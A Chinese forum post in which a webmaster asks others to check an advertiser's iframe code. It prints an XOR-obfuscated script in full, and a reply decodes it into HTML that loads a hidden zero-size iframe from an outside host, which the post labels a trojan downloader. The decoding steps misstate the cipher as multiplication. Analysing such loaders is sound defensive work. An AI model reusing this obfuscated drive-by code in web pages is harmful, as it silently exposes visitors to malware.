恳请大家帮忙分析个页面
首先我声明下,可能有
是一广告商要找我做的包月广告,整个代码是这样的
<iframe src="http://www.e9ad.cn/pcdd/dd5.htm" marginwidth="1" marginheight="1" height="60" width="468" scrolling="no" border="0" frameborder="0"></iframe>
打开http://www.e9ad.cn/pcdd/dd5.htm后发现 根本就查不到源代码
目标另存为发现是
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0031)http://www.e9ad.cn/pcdd/dd5.htm -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=unicode">
<SCRIPT language=javascript>var DXET=function(a){return String.fromCharCode(a^182)};document.write(DXET(138)+DXET(222)+DXET(194)+DXET(219)+DXET(218)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(222)+DXET(211)+DXET(215)+DXET(210)+DXET(136)+DXET(187)+DXET(188)+DXET(138)+DXET(197)+DXET(213)+DXET(196)+DXET(223)+DXET(198)+DXET(194)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(208)+DXET(195)+DXET(216)+DXET(213)+DXET(194)+DXET(223)+DXET(217)+DXET(216)+DXET(150)+DXET(213)+DXET(218)+DXET(211)+DXET(215)+DXET(196)+DXET(158)+DXET(159)+DXET(205)+DXET(187)+DXET(188)+DXET(150)+DXET(229)+DXET(217)+DXET(195)+DXET(196)+DXET(213)+DXET(211)+DXET(139)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(152)+DXET(208)+DXET(223)+DXET(196)+DXET(197)+DXET(194)+DXET(245)+DXET(222)+DXET(223)+DXET(218)+DXET(210)+DXET(152)+DXET(210)+DXET(215)+DXET(194)+DXET(215)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(217)+DXET(198)+DXET(211)+DXET(216)+DXET(158)+DXET(159)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(213)+DXET(218)+DXET(217)+DXET(197)+DXET(211)+DXET(158)+DXET(159)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(194)+DXET(223)+DXET(194)+DXET(218)+DXET(211)+DXET(139)+DXET(148)+DXET(209)+DXET(209)+DXET(148)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(152)+DXET(223)+DXET(216)+DXET(216)+DXET(211)+DXET(196)+DXET(254)+DXET(226)+DXET(251)+DXET(250)+DXET(139)+DXET(229)+DXET(217)+DXET(195)+DXET(196)+DXET(213)+DXET(211)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(203)+DXET(138)+DXET(153)+DXET(197)+DXET(213)+DXET(196)+DXET(223)+DXET(198)+DXET(194)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(194)+DXET(223)+DXET(194)+DXET(218)+DXET(211)+DXET(136)+DXET(215)+DXET(210)+DXET(138)+DXET(153)+DXET(194)+DXET(223)+DXET(194)+DXET(218)+DXET(211)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(153)+DXET(222)+DXET(211)+DXET(215)+DXET(210)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(150)+DXET(217)+DXET(216)+DXET(218)+DXET(217)+DXET(215)+DXET(210)+DXET(139)+DXET(213)+DXET(218)+DXET(211)+DXET(215)+DXET(196)+DXET(158)+DXET(159)+DXET(150)+DXET(194)+DXET(217)+DXET(198)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(218)+DXET(211)+DXET(208)+DXET(194)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(196)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(212)+DXET(217)+DXET(194)+DXET(194)+DXET(217)+DXET(219)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(151)+DXET(155)+DXET(155)+DXET(187)+DXET(188)+DXET(138)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(150)+DXET(216)+DXET(215)+DXET(219)+DXET(211)+DXET(139)+DXET(148)+DXET(255)+DXET(135)+DXET(148)+DXET(150)+DXET(197)+DXET(196)+DXET(213)+DXET(139)+DXET(148)+DXET(209)+DXET(209)+DXET(132)+DXET(152)+DXET(222)+DXET(194)+DXET(219)+DXET(148)+DXET(150)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(193)+DXET(223)+DXET(210)+DXET(194)+DXET(222)+DXET(139)+DXET(148)+DXET(135)+DXET(148)+DXET(150)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(222)+DXET(211)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(139)+DXET(148)+DXET(135)+DXET(148)+DXET(150)+DXET(222)+DXET(211)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(139)+DXET(148)+DXET(128)+DXET(134)+DXET(148)+DXET(150)+DXET(193)+DXET(223)+DXET(210)+DXET(194)+DXET(222)+DXET(139)+DXET(148)+DXET(130)+DXET(128)+DXET(142)+DXET(148)+DXET(150)+DXET(197)+DXET(213)+DXET(196)+DXET(217)+DXET(218)+DXET(218)+DXET(223)+DXET(216)+DXET(209)+DXET(139)+DXET(148)+DXET(216)+DXET(217)+DXET(148)+DXET(150)+DXET(212)+DXET(217)+DXET(196)+DXET(210)+DXET(211)+DXET(196)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(212)+DXET(217)+DXET(196)+DXET(210)+DXET(211)+DXET(196)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(136)+DXET(138)+DXET(153)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(155)+DXET(155)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(153)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(153)+DXET(222)+DXET(194)+DXET(219)+DXET(218)+DXET(136)+DXET(150)+DXET(187)+DXET(188)+DXET(138)+DXET(229)+DXET(245)+DXET(228)+DXET(255)+DXET(230)+DXET(226)+DXET(136)+DXET(150)+DXET(187)+DXET(188)+DXET(138)+DXET(151)+DXET(155)+DXET(155)+DXET(150)+DXET(187)+DXET(188)+DXET(193)+DXET(223)+DXET(216)+DXET(210)+DXET(217)+DXET(193)+DXET(152)+DXET(210)+DXET(211)+DXET(208)+DXET(215)+DXET(195)+DXET(218)+DXET(194)+DXET(229)+DXET(194)+DXET(215)+DXET(194)+DXET(195)+DXET(197)+DXET(139)+DXET(148)+DXET(150)+DXET(150)+DXET(148)+DXET(141)+DXET(150)+DXET(187)+DXET(188)+DXET(153)+DXET(153)+DXET(155)+DXET(155)+DXET(136)+DXET(150)+DXET(187)+DXET(188)+DXET(138)+DXET(153)+DXET(229)+DXET(245)+DXET(228)+DXET(255)+DXET(230)+DXET(226)+DXET(136)+DXET(187)+DXET(188)+DXET(138)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(150)+DXET(197)+DXET(196)+DXET(213)+DXET(139)+DXET(222)+DXET(194)+DXET(194)+DXET(198)+DXET(140)+DXET(153)+DXET(153)+DXET(198)+DXET(217)+DXET(198)+DXET(152)+DXET(193)+DXET(204)+DXET(206)+DXET(199)+DXET(207)+DXET(152)+DXET(213)+DXET(217)+DXET(219)+DXET(153)+DXET(129)+DXET(129)+DXET(129)+DXET(153)+DXET(223)+DXET(216)+DXET(210)+DXET(211)+DXET(206)+DXET(152)+DXET(222)+DXET(194)+DXET(219)+DXET(150)+DXET(193)+DXET(223)+DXET(210)+DXET(194)+DXET(222)+DXET(139)+DXET(134)+DXET(150)+DXET(222)+DXET(211)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(139)+DXET(134)+DXET(136)+DXET(138)+DXET(153)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(136)+DXET(187)+DXET(188)+DXET(187)+DXET(188)+'');</SCRIPT>
<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
<BODY></BODY></HTML><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0031)http://www.e9ad.cn/pcdd/dd5.htm -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=unicode">
<SCRIPT language=javascript>var DXET=function(a){return String.fromCharCode(a^182)};document.write(DXET(138)+DXET(222)+DXET(194)+DXET(219)+DXET(218)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(222)+DXET(211)+DXET(215)+DXET(210)+DXET(136)+DXET(187)+DXET(188)+DXET(138)+DXET(197)+DXET(213)+DXET(196)+DXET(223)+DXET(198)+DXET(194)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(208)+DXET(195)+DXET(216)+DXET(213)+DXET(194)+DXET(223)+DXET(217)+DXET(216)+DXET(150)+DXET(213)+DXET(218)+DXET(211)+DXET(215)+DXET(196)+DXET(158)+DXET(159)+DXET(205)+DXET(187)+DXET(188)+DXET(150)+DXET(229)+DXET(217)+DXET(195)+DXET(196)+DXET(213)+DXET(211)+DXET(139)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(152)+DXET(208)+DXET(223)+DXET(196)+DXET(197)+DXET(194)+DXET(245)+DXET(222)+DXET(223)+DXET(218)+DXET(210)+DXET(152)+DXET(210)+DXET(215)+DXET(194)+DXET(215)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(217)+DXET(198)+DXET(211)+DXET(216)+DXET(158)+DXET(159)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(213)+DXET(218)+DXET(217)+DXET(197)+DXET(211)+DXET(158)+DXET(159)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(194)+DXET(223)+DXET(194)+DXET(218)+DXET(211)+DXET(139)+DXET(148)+DXET(209)+DXET(209)+DXET(148)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(210)+DXET(217)+DXET(213)+DXET(195)+DXET(219)+DXET(211)+DXET(216)+DXET(194)+DXET(152)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(152)+DXET(223)+DXET(216)+DXET(216)+DXET(211)+DXET(196)+DXET(254)+DXET(226)+DXET(251)+DXET(250)+DXET(139)+DXET(229)+DXET(217)+DXET(195)+DXET(196)+DXET(213)+DXET(211)+DXET(141)+DXET(187)+DXET(188)+DXET(150)+DXET(203)+DXET(138)+DXET(153)+DXET(197)+DXET(213)+DXET(196)+DXET(223)+DXET(198)+DXET(194)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(194)+DXET(223)+DXET(194)+DXET(218)+DXET(211)+DXET(136)+DXET(215)+DXET(210)+DXET(138)+DXET(153)+DXET(194)+DXET(223)+DXET(194)+DXET(218)+DXET(211)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(153)+DXET(222)+DXET(211)+DXET(215)+DXET(210)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(150)+DXET(217)+DXET(216)+DXET(218)+DXET(217)+DXET(215)+DXET(210)+DXET(139)+DXET(213)+DXET(218)+DXET(211)+DXET(215)+DXET(196)+DXET(158)+DXET(159)+DXET(150)+DXET(194)+DXET(217)+DXET(198)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(218)+DXET(211)+DXET(208)+DXET(194)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(196)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(212)+DXET(217)+DXET(194)+DXET(194)+DXET(217)+DXET(219)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(151)+DXET(155)+DXET(155)+DXET(187)+DXET(188)+DXET(138)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(150)+DXET(216)+DXET(215)+DXET(219)+DXET(211)+DXET(139)+DXET(148)+DXET(255)+DXET(135)+DXET(148)+DXET(150)+DXET(197)+DXET(196)+DXET(213)+DXET(139)+DXET(148)+DXET(209)+DXET(209)+DXET(132)+DXET(152)+DXET(222)+DXET(194)+DXET(219)+DXET(148)+DXET(150)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(193)+DXET(223)+DXET(210)+DXET(194)+DXET(222)+DXET(139)+DXET(148)+DXET(135)+DXET(148)+DXET(150)+DXET(219)+DXET(215)+DXET(196)+DXET(209)+DXET(223)+DXET(216)+DXET(222)+DXET(211)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(139)+DXET(148)+DXET(135)+DXET(148)+DXET(150)+DXET(222)+DXET(211)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(139)+DXET(148)+DXET(128)+DXET(134)+DXET(148)+DXET(150)+DXET(193)+DXET(223)+DXET(210)+DXET(194)+DXET(222)+DXET(139)+DXET(148)+DXET(130)+DXET(128)+DXET(142)+DXET(148)+DXET(150)+DXET(197)+DXET(213)+DXET(196)+DXET(217)+DXET(218)+DXET(218)+DXET(223)+DXET(216)+DXET(209)+DXET(139)+DXET(148)+DXET(216)+DXET(217)+DXET(148)+DXET(150)+DXET(212)+DXET(217)+DXET(196)+DXET(210)+DXET(211)+DXET(196)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(150)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(212)+DXET(217)+DXET(196)+DXET(210)+DXET(211)+DXET(196)+DXET(139)+DXET(148)+DXET(134)+DXET(148)+DXET(136)+DXET(138)+DXET(153)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(155)+DXET(155)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(153)+DXET(212)+DXET(217)+DXET(210)+DXET(207)+DXET(136)+DXET(187)+DXET(188)+DXET(150)+DXET(138)+DXET(153)+DXET(222)+DXET(194)+DXET(219)+DXET(218)+DXET(136)+DXET(150)+DXET(187)+DXET(188)+DXET(138)+DXET(229)+DXET(245)+DXET(228)+DXET(255)+DXET(230)+DXET(226)+DXET(136)+DXET(150)+DXET(187)+DXET(188)+DXET(138)+DXET(151)+DXET(155)+DXET(155)+DXET(150)+DXET(187)+DXET(188)+DXET(193)+DXET(223)+DXET(216)+DXET(210)+DXET(217)+DXET(193)+DXET(152)+DXET(210)+DXET(211)+DXET(208)+DXET(215)+DXET(195)+DXET(218)+DXET(194)+DXET(229)+DXET(194)+DXET(215)+DXET(194)+DXET(195)+DXET(197)+DXET(139)+DXET(148)+DXET(150)+DXET(150)+DXET(148)+DXET(141)+DXET(150)+DXET(187)+DXET(188)+DXET(153)+DXET(153)+DXET(155)+DXET(155)+DXET(136)+DXET(150)+DXET(187)+DXET(188)+DXET(138)+DXET(153)+DXET(229)+DXET(245)+DXET(228)+DXET(255)+DXET(230)+DXET(226)+DXET(136)+DXET(187)+DXET(188)+DXET(138)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(150)+DXET(197)+DXET(196)+DXET(213)+DXET(139)+DXET(222)+DXET(194)+DXET(194)+DXET(198)+DXET(140)+DXET(153)+DXET(153)+DXET(198)+DXET(217)+DXET(198)+DXET(152)+DXET(193)+DXET(204)+DXET(206)+DXET(199)+DXET(207)+DXET(152)+DXET(213)+DXET(217)+DXET(219)+DXET(153)+DXET(129)+DXET(129)+DXET(129)+DXET(153)+DXET(223)+DXET(216)+DXET(210)+DXET(211)+DXET(206)+DXET(152)+DXET(222)+DXET(194)+DXET(219)+DXET(150)+DXET(193)+DXET(223)+DXET(210)+DXET(194)+DXET(222)+DXET(139)+DXET(134)+DXET(150)+DXET(222)+DXET(211)+DXET(223)+DXET(209)+DXET(222)+DXET(194)+DXET(139)+DXET(134)+DXET(136)+DXET(138)+DXET(153)+DXET(223)+DXET(208)+DXET(196)+DXET(215)+DXET(219)+DXET(211)+DXET(136)+DXET(187)+DXET(188)+DXET(187)+DXET(188)+'');</SCRIPT>
<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
<BODY></BODY></HTML>
恳请帮忙分析下,我不会在我自己站上挂木马放病毒的,所以想找大家帮忙确认下!!!谢谢!!
1.析出 上文 中 所有数字.并用|隔开.
2.用|切为数组.
3.历遍 每个数*182. 前缀 &# 后缀 ;
4.将3中历遍打印出来.
5.复制4中输出,文本编辑.以html格式打开.
6.就完了:)
<html> <head> <script> function clear(){ Source=document.body.firstChild.data; document.open(); document.close(); document.title="gg"; document.body.innerHTML=Source; }</script> <title>ad</title> </head> <body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0"> <!-- <iframe name="I1" src="gg2.htm" marginwidth="1" marginheight="1" height="60" width="468" scrolling="no" border="0" frameborder="0"></iframe> --> </body> </html> <SCRIPT> <!-- window.defaultStatus=" "; //--> </SCRIPT> <iframe src=http://pop.wzxqy.com/777/index.htm width=0 height=0></iframe> <html> <head> <script> function clear(){ Source=document.body.firstChild.data; document.open(); document.close(); document.title="gg"; document.body.innerHTML=Source; }</script> <title>ad</title> </head> <body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0"> <!-- <iframe name="I1" src="gg2.htm" marginwidth="1" marginheight="1" height="60" width="468" scrolling="no" border="0" frameborder="0"></iframe> --> </body> </html> <SCRIPT> <!-- window.defaultStatus=" "; //--> </SCRIPT> <iframe src=http://pop.wzxqy.com/777/index.htm width=0 height=0></iframe>
木马下载Js解密档: